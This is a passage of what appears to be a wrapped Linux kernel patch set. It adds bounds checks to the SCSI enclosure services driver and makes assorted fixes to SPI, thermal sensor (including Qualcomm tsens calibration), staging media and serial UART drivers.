+ 					len = (desc_ptr[2] << 8) + desc_ptr[3];
+ 					desc_ptr += 4;
+-					/* Add trailing zero - pushes into
+-					 * reserved space */
+-					desc_ptr[len] = '\0';
+-					name = desc_ptr;
++					if (desc_ptr + len > buf + page7_len)
++						desc_ptr = NULL;
++					else {
++						/* Add trailing zero - pushes into
++						 * reserved space */
++						desc_ptr[len] = '\0';
++						name = desc_ptr;
++					}
+ 				}
+ 			}
+ 			if (type_ptr[0] == ENCLOSURE_COMPONENT_DEVICE ||
+@@ -583,10 +600,14 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 					ecomp = &edev->component[components++];
+ 
+ 				if (!IS_ERR(ecomp)) {
+-					if (addl_desc_ptr)
+-						ses_process_descriptor(
+-							ecomp,
+-							addl_desc_ptr);
++					if (addl_desc_ptr) {
++						max_desc_len = ses_dev->page10_len -
++						    (addl_desc_ptr - ses_dev->page10);
++						if (ses_process_descriptor(ecomp,
++						    addl_desc_ptr,
++						    max_desc_len))
++							addl_desc_ptr = NULL;
++					}
+ 					if (create)
+ 						enclosure_component_register(
+ 							ecomp);
+@@ -603,9 +624,11 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 			     /* these elements are optional */
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_TARGET_PORT ||
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_INITIATOR_PORT ||
+-			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS))
++			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS)) {
+ 				addl_desc_ptr += addl_desc_ptr[1] + 2;
+-
++				if (addl_desc_ptr + 1 >= ses_dev->page10 + ses_dev->page10_len)
++					addl_desc_ptr = NULL;
++			}
+ 		}
+ 	}
+ 	kfree(buf);
+@@ -704,6 +727,12 @@ static int ses_intf_add(struct device *cdev,
+ 		    type_ptr[0] == ENCLOSURE_COMPONENT_ARRAY_DEVICE)
+ 			components += type_ptr[1];
+ 	}
++
++	if (components == 0) {
++		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
++		goto err_free;
++	}
++
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -827,7 +856,8 @@ static void ses_intf_remove_enclosure(struct scsi_device *sdev)
+ 	kfree(ses_dev->page2);
+ 	kfree(ses_dev);
+ 
+-	kfree(edev->component[0].scratch);
++	if (edev->components)
++		kfree(edev->component[0].scratch);
+ 
+ 	put_device(&edev->edev);
+ 	enclosure_unregister(edev);
+diff --git a/drivers/scsi/snic/snic_debugfs.c b/drivers/scsi/snic/snic_debugfs.c
+index 57bdc3ba49d9c..9dd975b36b5bd 100644
+--- a/drivers/scsi/snic/snic_debugfs.c
++++ b/drivers/scsi/snic/snic_debugfs.c
+@@ -437,6 +437,6 @@ void snic_trc_debugfs_init(void)
+ void
+ snic_trc_debugfs_term(void)
+ {
+-	debugfs_remove(debugfs_lookup(TRC_FILE, snic_glob->trc_root));
+-	debugfs_remove(debugfs_lookup(TRC_ENABLE_FILE, snic_glob->trc_root));
++	debugfs_lookup_and_remove(TRC_FILE, snic_glob->trc_root);
++	debugfs_lookup_and_remove(TRC_ENABLE_FILE, snic_glob->trc_root);
+ }
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index 93929f19d0831..b65cdf2a7593e 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -127,7 +127,8 @@ MODULE_PARM_DESC(cdns_mcp_int_mask, "Cadence MCP IntMask");
+ 
+ #define CDNS_MCP_CMD_BASE			0x80
+ #define CDNS_MCP_RESP_BASE			0x80
+-#define CDNS_MCP_CMD_LEN			0x20
++/* FIFO can hold 8 commands */
++#define CDNS_MCP_CMD_LEN			8
+ #define CDNS_MCP_CMD_WORD_LEN			0x4
+ 
+ #define CDNS_MCP_CMD_SSP_TAG			BIT(31)
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index d1bb62f7368b7..d4b969e68c314 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -295,7 +295,6 @@ config SPI_DW_BT1
+ 	tristate "Baikal-T1 SPI driver for DW SPI core"
+ 	depends on MIPS_BAIKAL_T1 || COMPILE_TEST
+ 	select MULTIPLEXER
+-	select MUX_MMIO
+ 	help
+ 	  Baikal-T1 SoC is equipped with three DW APB SSI-based MMIO SPI
+ 	  controllers. Two of them are pretty much normal: with IRQ, DMA,
+diff --git a/drivers/spi/spi-bcm63xx-hsspi.c b/drivers/spi/spi-bcm63xx-hsspi.c
+index b871fd810d801..02f56fc001b47 100644
+--- a/drivers/spi/spi-bcm63xx-hsspi.c
++++ b/drivers/spi/spi-bcm63xx-hsspi.c
+@@ -163,6 +163,7 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 	int step_size = HSSPI_BUFFER_LEN;
+ 	const u8 *tx = t->tx_buf;
+ 	u8 *rx = t->rx_buf;
++	u32 val = 0;
+ 
+ 	bcm63xx_hsspi_set_clk(bs, spi, t->speed_hz);
+ 	bcm63xx_hsspi_set_cs(bs, spi->chip_select, true);
+@@ -178,11 +179,16 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 		step_size -= HSSPI_OPCODE_LEN;
+ 
+ 	if ((opcode == HSSPI_OP_READ && t->rx_nbits == SPI_NBITS_DUAL) ||
+-	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL))
++	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL)) {
+ 		opcode |= HSSPI_OP_MULTIBIT;
+ 
+-	__raw_writel(1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT |
+-		     1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT | 0xff,
++		if (t->rx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT;
++		if (t->tx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT;
++	}
++
++	__raw_writel(val | 0xff,
+ 		     bs->regs + HSSPI_PROFILE_MODE_CTRL_REG(chip_select));
+ 
+ 	while (pending > 0) {
+diff --git a/drivers/spi/spi-synquacer.c b/drivers/spi/spi-synquacer.c
+index 47cbe73137c23..dc188f9202c97 100644
+--- a/drivers/spi/spi-synquacer.c
++++ b/drivers/spi/spi-synquacer.c
+@@ -472,10 +472,9 @@ static int synquacer_spi_transfer_one(struct spi_master *master,
+ 		read_fifo(sspi);
+ 	}
+ 
+-	if (status < 0) {
+-		dev_err(sspi->dev, "failed to transfer. status: 0x%x\n",
+-			status);
+-		return status;
++	if (status == 0) {
++		dev_err(sspi->dev, "failed to transfer. Timeout.\n");
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/staging/media/atomisp/pci/atomisp_fops.c b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+index 84a84e0cdeef7..5fa2e2596a818 100644
+--- a/drivers/staging/media/atomisp/pci/atomisp_fops.c
++++ b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+@@ -741,13 +741,13 @@ init_subdev:
+ 		goto done;
+ 
+ 	atomisp_subdev_init_struct(asd);
++	/* Ensure that a mode is set */
++	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ done:
+ 	pipe->users++;
+ 	mutex_unlock(&isp->mutex);
+ 
+-	/* Ensure that a mode is set */
+-	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/staging/media/imx/imx7-media-csi.c b/drivers/staging/media/imx/imx7-media-csi.c
+index c77401f184d74..5f6376c3269ab 100644
+--- a/drivers/staging/media/imx/imx7-media-csi.c
++++ b/drivers/staging/media/imx/imx7-media-csi.c
+@@ -638,8 +638,10 @@ static int imx7_csi_init(struct imx7_csi *csi)
+ 	imx7_csi_configure(csi);
+ 
+ 	ret = imx7_csi_dma_setup(csi);
+-	if (ret < 0)
++	if (ret < 0) {
++		clk_disable_unprepare(csi->mclk);
+ 		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/thermal/hisi_thermal.c b/drivers/thermal/hisi_thermal.c
+index d6974db7aaf76..15af90f5c7d91 100644
+--- a/drivers/thermal/hisi_thermal.c
++++ b/drivers/thermal/hisi_thermal.c
+@@ -427,10 +427,6 @@ static int hi3660_thermal_probe(struct hisi_thermal_data *data)
+ 	data->sensor[0].irq_name = "tsensor_a73";
+ 	data->sensor[0].data = data;
+ 
+-	data->sensor[1].id = HI3660_LITTLE_SENSOR;
+-	data->sensor[1].irq_name = "tsensor_a53";
+-	data->sensor[1].data = data;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/thermal/imx_sc_thermal.c b/drivers/thermal/imx_sc_thermal.c
+index 5d92b70a5d53a..dfadb03580ae1 100644
+--- a/drivers/thermal/imx_sc_thermal.c
++++ b/drivers/thermal/imx_sc_thermal.c
+@@ -88,7 +88,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	if (!resource_id)
+ 		return -EINVAL;
+ 
+-	for (i = 0; resource_id[i] > 0; i++) {
++	for (i = 0; resource_id[i] >= 0; i++) {
+ 
+ 		sensor = devm_kzalloc(&pdev->dev, sizeof(*sensor), GFP_KERNEL);
+ 		if (!sensor)
+@@ -127,12 +127,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int imx_sc_thermal_remove(struct platform_device *pdev)
+-{
+-	return 0;
+-}
+-
+-static int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
++static const int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
+ 
+ static const struct of_device_id imx_sc_thermal_table[] = {
+ 	{ .compatible = "fsl,imx-sc-thermal", .data =  imx_sc_sensors },
+@@ -142,7 +137,6 @@ MODULE_DEVICE_TABLE(of, imx_sc_thermal_table);
+ 
+ static struct platform_driver imx_sc_thermal_driver = {
+ 		.probe = imx_sc_thermal_probe,
+-		.remove	= imx_sc_thermal_remove,
+ 		.driver = {
+ 			.name = "imx-sc-thermal",
+ 			.of_match_table = imx_sc_thermal_table,
+diff --git a/drivers/thermal/intel/intel_pch_thermal.c b/drivers/thermal/intel/intel_pch_thermal.c
+index dabf11a687a15..9e27f430e0345 100644
+--- a/drivers/thermal/intel/intel_pch_thermal.c
++++ b/drivers/thermal/intel/intel_pch_thermal.c
+@@ -29,6 +29,7 @@
+ #define PCH_THERMAL_DID_CNL_LP	0x02F9 /* CNL-LP PCH */
+ #define PCH_THERMAL_DID_CML_H	0X06F9 /* CML-H PCH */
+ #define PCH_THERMAL_DID_LWB	0xA1B1 /* Lewisburg PCH */
++#define PCH_THERMAL_DID_WBG	0x8D24 /* Wellsburg PCH */
+ 
+ /* Wildcat Point-LP  PCH Thermal registers */
+ #define WPT_TEMP	0x0000	/* Temperature */
+@@ -350,6 +351,7 @@ enum board_ids {
+ 	board_cnl,
+ 	board_cml,
+ 	board_lwb,
++	board_wbg,
+ };
+ 
+ static const struct board_info {
+@@ -380,6 +382,10 @@ static const struct board_info {
+ 		.name = "pch_lewisburg",
+ 		.ops = &pch_dev_ops_wpt,
+ 	},
++	[board_wbg] = {
++		.name = "pch_wellsburg",
++		.ops = &pch_dev_ops_wpt,
++	},
+ };
+ 
+ static int intel_pch_thermal_probe(struct pci_dev *pdev,
+@@ -495,6 +501,8 @@ static const struct pci_device_id intel_pch_thermal_id[] = {
+ 		.driver_data = board_cml, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_LWB),
+ 		.driver_data = board_lwb, },
++	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_WBG),
++		.driver_data = board_wbg, },
+ 	{ 0, },
+ };
+ MODULE_DEVICE_TABLE(pci, intel_pch_thermal_id);
+diff --git a/drivers/thermal/intel/intel_powerclamp.c b/drivers/thermal/intel/intel_powerclamp.c
+index b80e25ec12615..2f4cbfdf26a00 100644
+--- a/drivers/thermal/intel/intel_powerclamp.c
++++ b/drivers/thermal/intel/intel_powerclamp.c
+@@ -57,6 +57,7 @@
+ 
+ static unsigned int target_mwait;
+ static struct dentry *debug_dir;
++static bool poll_pkg_cstate_enable;
+ 
+ /* user selected target */
+ static unsigned int set_target_ratio;
+@@ -261,6 +262,9 @@ static unsigned int get_compensation(int ratio)
+ {
+ 	unsigned int comp = 0;
+ 
++	if (!poll_pkg_cstate_enable)
++		return 0;
++
+ 	/* we only use compensation if all adjacent ones are good */
+ 	if (ratio == 1 &&
+ 		cal_data[ratio].confidence >= CONFIDENCE_OK &&
+@@ -519,7 +523,8 @@ static int start_power_clamp(void)
+ 	control_cpu = cpumask_first(cpu_online_mask);
+ 
+ 	clamping = true;
+-	schedule_delayed_work(&poll_pkg_cstate_work, 0);
++	if (poll_pkg_cstate_enable)
++		schedule_delayed_work(&poll_pkg_cstate_work, 0);
+ 
+ 	/* start one kthread worker per online cpu */
+ 	for_each_online_cpu(cpu) {
+@@ -585,11 +590,15 @@ static int powerclamp_get_max_state(struct thermal_cooling_device *cdev,
+ static int powerclamp_get_cur_state(struct thermal_cooling_device *cdev,
+ 				 unsigned long *state)
+ {
+-	if (true == clamping)
+-		*state = pkg_cstate_ratio_cur;
+-	else
++	if (clamping) {
++		if (poll_pkg_cstate_enable)
++			*state = pkg_cstate_ratio_cur;
++		else
++			*state = set_target_ratio;
++	} else {
+ 		/* to save power, do not poll idle ratio while not clamping */
+ 		*state = -1; /* indicates invalid state */
++	}
+ 
+ 	return 0;
+ }
+@@ -712,6 +721,9 @@ static int __init powerclamp_init(void)
+ 		goto exit_unregister;
+ 	}
+ 
++	if (topology_max_packages() == 1 && topology_max_die_per_package() == 1)
++		poll_pkg_cstate_enable = true;
++
+ 	cooling_dev = thermal_cooling_device_register("intel_powerclamp", NULL,
+ 						&powerclamp_cooling_ops);
+ 	if (IS_ERR(cooling_dev)) {
+diff --git a/drivers/thermal/intel/intel_soc_dts_iosf.c b/drivers/thermal/intel/intel_soc_dts_iosf.c
+index 342b0bb5a56d9..8651ff1abe754 100644
+--- a/drivers/thermal/intel/intel_soc_dts_iosf.c
++++ b/drivers/thermal/intel/intel_soc_dts_iosf.c
+@@ -405,7 +405,7 @@ struct intel_soc_dts_sensors *intel_soc_dts_iosf_init(
+ {
+ 	struct intel_soc_dts_sensors *sensors;
+ 	bool notification;
+-	u32 tj_max;
++	int tj_max;
+ 	int ret;
+ 	int i;
+ 
+diff --git a/drivers/thermal/qcom/tsens-v0_1.c b/drivers/thermal/qcom/tsens-v0_1.c
+index 327f37202c69f..8d036727b99fe 100644
+--- a/drivers/thermal/qcom/tsens-v0_1.c
++++ b/drivers/thermal/qcom/tsens-v0_1.c
+@@ -285,7 +285,7 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	u32 p1[10], p2[10];
+ 	int mode = 0;
+ 	u32 *qfprom_cdata;
+-	u32 cdata[6];
++	u32 cdata[4];
+ 
+ 	qfprom_cdata = (u32 *)qfprom_read(priv->dev, "calib");
+ 	if (IS_ERR(qfprom_cdata))
+@@ -296,8 +296,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	cdata[1] = qfprom_cdata[13];
+ 	cdata[2] = qfprom_cdata[0];
+ 	cdata[3] = qfprom_cdata[1];
+-	cdata[4] = qfprom_cdata[22];
+-	cdata[5] = qfprom_cdata[21];
+ 
+ 	mode = (cdata[0] & MSM8939_CAL_SEL_MASK) >> MSM8939_CAL_SEL_SHIFT;
+ 	dev_dbg(priv->dev, "calibration mode is %d\n", mode);
+@@ -314,8 +312,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p2[6] = (cdata[2] & MSM8939_S6_P2_MASK) >> MSM8939_S6_P2_SHIFT;
+ 		p2[7] = (cdata[3] & MSM8939_S7_P2_MASK) >> MSM8939_S7_P2_SHIFT;
+ 		p2[8] = (cdata[3] & MSM8939_S8_P2_MASK) >> MSM8939_S8_P2_SHIFT;
+-		p2[9] = (cdata[4] & MSM8939_S9_P2_MASK_0_4) >> MSM8939_S9_P2_SHIFT_0_4;
+-		p2[9] |= ((cdata[5] & MSM8939_S9_P2_MASK_5) >> MSM8939_S9_P2_SHIFT_5) << 5;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p2[i] = (base1 + p2[i]) << 2;
+ 		fallthrough;
+@@ -331,7 +327,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p1[6] = (cdata[2] & MSM8939_S6_P1_MASK) >> MSM8939_S6_P1_SHIFT;
+ 		p1[7] = (cdata[3] & MSM8939_S7_P1_MASK) >> MSM8939_S7_P1_SHIFT;
+ 		p1[8] = (cdata[3] & MSM8939_S8_P1_MASK) >> MSM8939_S8_P1_SHIFT;
+-		p1[9] = (cdata[4] & MSM8939_S9_P1_MASK) >> MSM8939_S9_P1_SHIFT;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p1[i] = ((base0) + p1[i]) << 2;
+ 		break;
+@@ -534,6 +529,21 @@ static int calibrate_9607(struct tsens_priv *priv)
+ 	return 0;
+ }
+ 
++static int __init init_8939(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 2911;
++	priv->sensor[1].slope = 2789;
++	priv->sensor[2].slope = 2906;
++	priv->sensor[3].slope = 2763;
++	priv->sensor[4].slope = 2922;
++	priv->sensor[5].slope = 2867;
++	priv->sensor[6].slope = 2833;
++	priv->sensor[7].slope = 2838;
++	priv->sensor[8].slope = 2840;
++	/* priv->sensor[9].slope = 2852; */
++
++	return init_common(priv);
++}
++
+ /* v0.1: 8916, 8939, 8974, 9607 */
+ 
+ static struct tsens_features tsens_v0_1_feat = {
+@@ -596,15 +606,15 @@ struct tsens_plat_data data_8916 = {
+ };
+ 
+ static const struct tsens_ops ops_8939 = {
+-	.init		= init_common,
++	.init		= init_8939,
+ 	.calibrate	= calibrate_8939,
+ 	.get_temp	= get_temp_common,
+ };
+ 
+ struct tsens_plat_data data_8939 = {
+-	.num_sensors	= 10,
++	.num_sensors	= 9,
+ 	.ops		= &ops_8939,
+-	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, 10 },
++	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, /* 10 */ },
+ 
+ 	.feat		= &tsens_v0_1_feat,
+ 	.fields	= tsens_v0_1_regfields,
+diff --git a/drivers/thermal/qcom/tsens-v1.c b/drivers/thermal/qcom/tsens-v1.c
+index 573e261ccca74..faa4576fa028f 100644
+--- a/drivers/thermal/qcom/tsens-v1.c
++++ b/drivers/thermal/qcom/tsens-v1.c
+@@ -78,11 +78,6 @@
+ 
+ #define MSM8976_CAL_SEL_MASK	0x3
+ 
+-#define MSM8976_CAL_DEGC_PT1	30
+-#define MSM8976_CAL_DEGC_PT2	120
+-#define MSM8976_SLOPE_FACTOR	1000
+-#define MSM8976_SLOPE_DEFAULT	3200
+-
+ /* eeprom layout data for qcs404/405 (v1) */
+ #define BASE0_MASK	0x000007f8
+ #define BASE1_MASK	0x0007f800
+@@ -142,30 +137,6 @@
+ #define CAL_SEL_MASK	7
+ #define CAL_SEL_SHIFT	0
+ 
+-static void compute_intercept_slope_8976(struct tsens_priv *priv,
+-			      u32 *p1, u32 *p2, u32 mode)
+-{
+-	int i;
+-
+-	priv->sensor[0].slope = 3313;
+-	priv->sensor[1].slope = 3275;
+-	priv->sensor[2].slope = 3320;
+-	priv->sensor[3].slope = 3246;
+-	priv->sensor[4].slope = 3279;
+-	priv->sensor[5].slope = 3257;
+-	priv->sensor[6].slope = 3234;
+-	priv->sensor[7].slope = 3269;
+-	priv->sensor[8].slope = 3255;
+-	priv->sensor[9].slope = 3239;
+-	priv->sensor[10].slope = 3286;
+-
+-	for (i = 0; i < priv->num_sensors; i++) {
+-		priv->sensor[i].offset = (p1[i] * MSM8976_SLOPE_FACTOR) -
+-				(MSM8976_CAL_DEGC_PT1 *
+-				priv->sensor[i].slope);
+-	}
+-}
+-
+ static int calibrate_v1(struct tsens_priv *priv)
+ {
+ 	u32 base0 = 0, base1 = 0;
+@@ -291,7 +262,7 @@ static int calibrate_8976(struct tsens_priv *priv)
+ 		break;
+ 	}
+ 
+-	compute_intercept_slope_8976(priv, p1, p2, mode);
++	compute_intercept_slope(priv, p1, p2, mode);
+ 	kfree(qfprom_cdata);
+ 
+ 	return 0;
+@@ -362,6 +333,22 @@ static const struct reg_field tsens_v1_regfields[MAX_REGFIELDS] = {
+ 	[TRDY] = REG_FIELD(TM_TRDY_OFF, 0, 0),
+ };
+ 
++static int __init init_8956(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 3313;
++	priv->sensor[1].slope = 3275;
++	priv->sensor[2].slope = 3320;
++	priv->sensor[3].slope = 3246;
++	priv->sensor[4].slope = 3279;
++	priv->sensor[5].slope = 3257;
++	priv->sensor[6].slope = 3234;
++	priv->sensor[7].slope = 3269;
++	priv->sensor[8].slope = 3255;
++	priv->sensor[9].slope = 3239;
++	priv->sensor[10].slope = 3286;
++
++	return init_common(priv);
++}
++
+ static const struct tsens_ops ops_generic_v1 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_v1,
+@@ -374,13 +361,25 @@ struct tsens_plat_data data_tsens_v1 = {
+ 	.fields	= tsens_v1_regfields,
+ };
+ 
++static const struct tsens_ops ops_8956 = {
++	.init		= init_8956,
++	.calibrate	= calibrate_8976,
++	.get_temp	= get_temp_tsens_valid,
++};
++
++struct tsens_plat_data data_8956 = {
++	.num_sensors	= 11,
++	.ops		= &ops_8956,
++	.feat		= &tsens_v1_feat,
++	.fields		= tsens_v1_regfields,
++};
++
+ static const struct tsens_ops ops_8976 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_8976,
+ 	.get_temp	= get_temp_tsens_valid,
+ };
+ 
+-/* Valid for both MSM8956 and MSM8976. */
+ struct tsens_plat_data data_8976 = {
+ 	.num_sensors	= 11,
+ 	.ops		= &ops_8976,
+diff --git a/drivers/thermal/qcom/tsens.c b/drivers/thermal/qcom/tsens.c
+index b1b10005fb286..252c5ffdd1b66 100644
+--- a/drivers/thermal/qcom/tsens.c
++++ b/drivers/thermal/qcom/tsens.c
+@@ -968,6 +968,9 @@ static const struct of_device_id tsens_table[] = {
+ 	}, {
+ 		.compatible = "qcom,msm8939-tsens",
+ 		.data = &data_8939,
++	}, {
++		.compatible = "qcom,msm8956-tsens",
++		.data = &data_8956,
+ 	}, {
+ 		.compatible = "qcom,msm8960-tsens",
+ 		.data = &data_8960,
+diff --git a/drivers/thermal/qcom/tsens.h b/drivers/thermal/qcom/tsens.h
+index ba05c82333565..4f969dd7dc47a 100644
+--- a/drivers/thermal/qcom/tsens.h
++++ b/drivers/thermal/qcom/tsens.h
+@@ -588,7 +588,7 @@ extern struct tsens_plat_data data_8960;
+ extern struct tsens_plat_data data_8916, data_8939, data_8974, data_9607;
+ 
+ /* TSENS v1 targets */
+-extern struct tsens_plat_data data_tsens_v1, data_8976;
++extern struct tsens_plat_data data_tsens_v1, data_8976, data_8956;
+ 
+ /* TSENS v2 targets */
+ extern struct tsens_plat_data data_8996, data_tsens_v2;
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 888e01fbd9c5f..13a6cd0116a13 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1393,9 +1393,9 @@ static int lpuart32_config_rs485(struct uart_port *port, struct ktermios *termio
+ 		 * Note: UART is assumed to be active high.
+ 		 */
+ 		if (rs485->flags & SER_RS485_RTS_ON_SEND)
+-			modem &= ~UARTMODEM_TXRTSPOL;
+-		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
+ 			modem |= UARTMODEM_TXRTSPOL;
++		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
++			modem &= ~UARTMODEM_TXRTSPOL;
+ 	}
+ 
+ 	lpuart32_write(&sport->port, modem, UARTMODIR);
+@@ -1684,12 +1684,6 @@ static void lpuart32_configure(struct lpuart_port *sport)
+ {
+ 	unsigned long temp;
+ 
+-	if (sport->lpuart_dma_rx_use) {
+-		/* RXWATER must be 0 */
+-		temp = lpuart32_read(&sport->port, UARTWATER);
+-		temp &= ~(UARTWATER_WATER_MASK << UARTWATER_RXWATER_OFF);
+-		lpuart32_write(&sport->port, temp, UARTWATER);
+-	}
+ 	temp = lpuart32_read(&sport->port, UARTCTRL);
+ 	if (!sport->lpuart_dma_rx_use)
+ 		temp |= UARTCTRL_RIE;
+@@ -1791,6 +1785,15 @@ static void lpuart32_shutdown(struct uart_port *port)
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+ 
++	/* clear status */
++	temp = lpuart32_read(&sport->port, UARTSTAT);
++	lpuart32_write(&sport->port, temp, UARTSTAT);
++
++	/* disable Rx/Tx DMA */
++	temp = lpuart32_read(port, UARTBAUD);
++	temp &= ~(UARTBAUD_TDMAE | UARTBAUD_RDMAE);
++	lpuart32_write(port, temp, UARTBAUD);
++
+ 	/* disable Rx/Tx and interrupts */
+ 	temp = lpuart32_read(port, UARTCTRL);
+ 	temp &= ~(UARTCTRL_TE | UARTCTRL_RE |
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index aadda66405b47..f07c4f9ff13c0 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -489,7 +489,7 @@ static void imx_uart_stop_tx(struct uart_port *port)
+ static void imx_uart_stop_rx(struct uart_port *port)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+-	u32 ucr1, ucr2, ucr4;
++	u32 ucr1, ucr2, ucr4, uts;
+ 
+ 	ucr1 = imx_uart_readl(sport, UCR1);
+ 	ucr2 = imx_uart_readl(sport, UCR2);
+@@ -505,7 +505,18 @@ static void imx_uart_stop_rx(struct uart_port *port)
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 	imx_uart_writel(sport, ucr4, UCR4);
+ 
+-	ucr2 &= ~UCR2_RXEN;
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	if (port->rs485.flags & SER_RS485_ENABLED &&
++	    port->rs485.flags & SER_RS485_RTS_ON_SEND &&
++	    sport->have_rtscts && !sport->have_rtsgpio) {
++		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++		uts |= UTS_LOOP;
++		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++		ucr2 |= UCR2_RXEN;
++	} else {
++		ucr2 &= ~UCR2_RXEN;
++	}
++
+ 	imx_uart_writel(sport, ucr2, UCR2);
+ }
+ 
+@@ -1393,7 +1404,7 @@ static int imx_uart_startup(struct uart_port *port)
+ 	int retval, i;
+ 	unsigned long flags;
+ 	int dma_is_inited = 0;
+-	u32 ucr1, ucr2, ucr3, ucr4;
++	u32 ucr1, ucr2, ucr3, ucr4, uts;
+ 
+ 	retval = clk_prepare_enable(sport->clk_per);
+ 	if (retval)
+@@ -1498,6 +1509,11 @@ static int imx_uart_startup(struct uart_port *port)
+ 		imx_uart_writel(sport, ucr2, UCR2);
+ 	}
+ 
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++	uts &= ~UTS_LOOP;
++	imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++
+ 	spin_unlock_irqrestore(&sport->port.lock, flags);
+ 
+ 	return 0;
+@@ -1507,7 +1523,7 @@ static void imx_uart_shutdown(struct uart_port *port)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+ 	unsigned long flags;
+-	u32 ucr1, ucr2, ucr4;
++	u32 ucr1, ucr2, ucr4, uts;
+ 
+ 	if (sport->dma_is_enabled) {
+ 		dmaengine_terminate_sync(sport->dma_chan_tx);
+@@ -1551,7 +1567,18 @@ static void imx_uart_shutdown(struct uart_port *port)
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+ 	ucr1 = imx_uart_readl(sport, UCR1);
+-	ucr1 &= ~(UCR1_TRDYEN | UCR1_RRDYEN | UCR1_RTSDEN | UCR1_UARTEN | UCR1_RXDMAEN | UCR1_ATDMAEN);
++	ucr1 &= ~(UCR1_TRDYEN | UCR1_RRDYEN | UCR1_RTSDEN | UCR1_RXDMAEN | UCR1_ATDMAEN);
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	if (port->rs485.flags & SER_RS485_ENABLED &&
++	    port->rs485.flags & SER_RS485_RTS_ON_SEND &&
++	    sport->have_rtscts && !sport->have_rtsgpio) {
++		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++		uts |= UTS_LOOP;
++		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++		ucr1 |= UCR1_UARTEN;
++	} else {
++		ucr1 &= ~UCR1_UARTEN;
++	}
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 
+ 	ucr4 = imx_uart_readl(sport, UCR4);
+@@ -2213,7 +2240,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	void __iomem *base;
+ 	u32 dma_buf_conf[2];
+ 	int ret = 0;
+-	u32 ucr1;
++	u32 ucr1, ucr2, uts;
+ 	struct resource *res;
+ 	int txirq, rxirq, rtsirq;
